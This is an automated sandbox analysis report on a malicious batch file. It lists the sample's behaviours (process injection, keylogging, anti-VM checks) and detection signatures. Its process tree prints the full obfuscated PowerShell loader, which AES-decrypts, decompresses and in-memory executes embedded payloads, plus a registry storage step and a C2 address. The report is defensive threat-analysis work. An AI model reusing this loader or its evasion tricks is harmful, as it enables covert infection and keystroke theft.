Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uy2g7z.bat

Overview

General Information

Sample name:uy2g7z.bat
Analysis ID:1637038
MD5:8c978ee76d617722aa91e4541333aed8
SHA1:3f5b77c057ef8b64aa0da7e9a6af7508eb76605a
SHA256:973a40fc27269affe13538285a98317ccdbc0846d234cc7d480621bf3944cd2e
Tags:45-94-31-176batuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell decrypt and execute
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Queries temperature or sensor information (via WMI often done to detect virtual machines)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 8328 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8380 cmdline: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8508 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" wjzJMHoFZaIaceAGUG " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8560 cmdline: powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • findstr.exe (PID: 8680 cmdline: "C:\Windows\system32\findstr.exe" /i WDS100T2B0A MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 8740 cmdline: cmd.exe /c echo function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6ieX6iAI6iQp6iH6iXC6iI6iSA6iu6ir6iB6ic6iL6i+6icB6i4j6i66iW6il6i4f6irm6ib6i76i/6i66ihB6ig6ir6iJ6iH6i26icK6iI6i=");'.Replace('6i', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$TaCK.pJIVpJ=[pJSypJspJtepJmpJ.CpJopJnpJvpJepJrpJtpJ]:pJ:FpJrpJopJmpJBapJsepJ6pJ4pJSpJtpJripJnpJgpJ("pJLypJW7pJocpJepJGopJ3pJ6XpJZpJlpJqpJrpJEpJEpJ5xpJlQpJ=pJ=");'.Replace('pJ', ''); $HzNF=$TaCK.CreateDecryptor(); $gTTC=$HzNF.TransformFinalBlock($vrVB, 0, $vrVB.Length); $HzNF.Dispose(); $TaCK.Dispose(); $gTTC;}function ppFM($vrVB){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$BYbD=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw(,$vrVB);'.Replace('uw', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$aohN=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw;'.Replace('uw', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$rQYH=QuNeQuw-QuObQujQuecQutQu SQuyQusQutQueQumQu.QuIOQu.CQuoQumQupQureQussQuiQuoQunQu.QuGZQuiQupQuSQutQurQueaQum($BYbD, Qu[IQuO.QuCoQumQuprQueQussQuiQuoQunQu.QuCQuoQumpQureQusQusQuiQuonQuMoQudQueQu]Qu:Qu:DQueQucQuoQumQupQureQusQus);'.Replace('Qu', ''); $rQYH.CopyTo($aohN); $rQYH.Dispose(); $BYbD.Dispose(); $aohN.Dispose(); $aohN.ToArray();}function QIGO($vrVB,$BCHx){ Invoke-Expression -Verbose -WarningAction Inquire '$lHpd=oR[SoRysoRteoRmoR.RoReoRfloReoRcoRtoRioRooRnoR.AoRssoReoRmoRboRlyoR]:oR:oRLoRooRaoRd([byte[]]$vrVB);'.Replace('oR', ''); Invoke-Expression -Debug -WarningAction Inquire '$AEjb=$lHpd.OBEnOBtrOByPOBoOBinOBt;'.Replace('OB', ''); Invoke-Expression -Debug '$AEjbR9.IR9nvR9okR9eR9($R9nR9ulR9lR9, $BCHx);'.Replace('R9', '');}function ZAB($lYat){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'vcKCVWMMyKQFoeskiSq;mNFaDYQRq;OvWrknEdQ'; Set-ItemProperty -Path $registryPath -Name 'vcKCVWMMyKQFoeskiSq' -Value $lYat; Set-ItemProperty -Path $registryPath -Name 'mNFaDYQRq' -Value 'eXAIQpHXCISAurBcL+cB4j6Wl4frmb7/6hBgrJH2cKI='; Set-ItemProperty -Path $registryPath -Name 'OvWrknEdQ' -Value 'LyW7oceGo36XZlqrEE5xlQ==';}$sjrS = 'C:\Users\user\Desktop\uy2g7z.bat';$host.UI.RawUI.WindowTitle = $sjrS;$ZyQM=[System.IO.File]::ReadAllText($sjrS).Split([Environment]::NewLine);foreach ($mcTi in $ZyQM) { if ($mcTi.StartsWith('tPpko')) { $eEXA=$mcTi.Substring(5); break; }}ZAB $eEXA;$lYat=[string[]]$eEXA.Split('\');Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$FAf = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[0].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$thN = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[1].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');Invoke-Expression -Verbose '$RKq = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[2].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');QIGO $FAf $null;QIGO $thN $null;QIGO $RKq (,[string[]] ('wjzJMHoFZaIaceAGUG')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8748 cmdline: powershell.exe -WindowStyle Hidden -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
          • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
            • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
            • svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
            • svchost.exe (PID: 404 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 656 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 900 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1028 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1204 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1232 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1372 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1452 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1472 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1636 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1692 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1716 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1736 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1788 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1880 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1964 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1972 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1980 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1304 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2132 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • spoolsv.exe (PID: 2176 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
            • svchost.exe (PID: 2292 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2396 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2408 cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2508 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2524 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • more.com (PID: 8772 cmdline: more MD5: EDB3046610020EE614B5B81B0439895E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    Process Memory Space: powershell.exe PID: 8748INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x3d37b:$b2: ::FromBase64String(
    • 0x3db35:$b2: ::FromBase64String(
    • 0x3dbe8:$b2: ::FromBase64String(
    • 0x3fab1:$b2: ::FromBase64String(
    • 0x8d7e8:$s1: -join
    • 0x1c6be3:$s1: -join
    • 0x1c879b:$s1: -join
    • 0x924dc:$s3: Reverse
    • 0x1ba50d:$s3: Reverse
    • 0x8824d:$s4: +=
    • 0x882ef:$s4: +=
    • 0x8ba07:$s4: +=
    • 0x8d4bd:$s4: +=
    • 0x8d6d3:$s4: +=
    • 0x8d7ca:$s4: +=
    • 0x1c25cf:$s4: +=
    • 0x1c25ee:$s4: +=
    • 0x1c2629:$s4: +=
    • 0x1c2646:$s4: +=
    • 0x1c2681:$s4: +=
    • 0x1c26ed:$s4: +=
    Process Memory Space: winlogon.exe PID: 556JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_8748.amsi.csvJoeSecurity_PowershellDecryptAndExecuteYara detected Powershell decrypt and executeJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: winlogon.exe, ParentImage: C:\Windows\System32\winlogon.exe, ParentProcessId: 556, ParentProcessName: winlogon.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 932, ProcessName: svchost.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" , CommandLine: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8328, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" , ProcessId: 8380, ProcessName: powershell.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-13T10:26:07.671914+010020355951Domain Observed Used for C2 Detected45.94.31.1764782192.168.2.549713TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Joe Sandbox ML detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
        Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.5:49714 version: TLS 1.2
        Source: Binary string: kernel32.pdbUGP source: winlogon.exe, 0000000D.00000003.1776106983.0000022FCEF6F000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\acrobat_sbx.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831535~1. source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorU source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdbUGP source: winlogon.exe, 0000000D.00000003.1571314943.0000022FD0980000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ~1.PDB source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdbUGP source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdb source: winlogon.exe, 0000000D.00000003.1571314943.0000022FD0980000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernel32.pdb source: winlogon.exe, 0000000D.00000003.1776106983.0000022FCEF6F000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831Cl source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdb source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA0F264 FindFirstFileExW,3_2_000001D54FA0F264
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA0F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_000001D54FA0F3E8
        Source: C:\Windows\System32\conhost.exeCode function: 4_2_00000281B7BCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00000281B7BCF3E8
        Source: C:\Windows\System32\conhost.exeCode function: 4_2_00000281B7BCF264 FindFirstFileExW,4_2_00000281B7BCF264
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D19F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_000001F66D19F3E8
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D19F264 FindFirstFileExW,9_2_000001F66D19F264
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB937F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_0000019AB937F3E8
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB937F264 FindFirstFileExW,14_2_0000019AB937F264
        Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001A53EDAF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001A53EDAF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001A53EDAF264 FindFirstFileExW,15_2_000001A53EDAF264
        Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000027D8F4CF264 FindFirstFileExW,17_2_0000027D8F4CF264
        Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000027D8F4CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_0000027D8F4CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EAF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000001AD09EAF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EAF264 FindFirstFileExW,18_2_000001AD09EAF264
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013F264 FindFirstFileExW,19_2_0000020EC013F264
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_0000020EC013F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6AF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_00000229EA6AF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6AF264 FindFirstFileExW,20_2_00000229EA6AF264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDCF264 FindFirstFileExW,21_2_000001777BDCF264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001777BDCF3E8
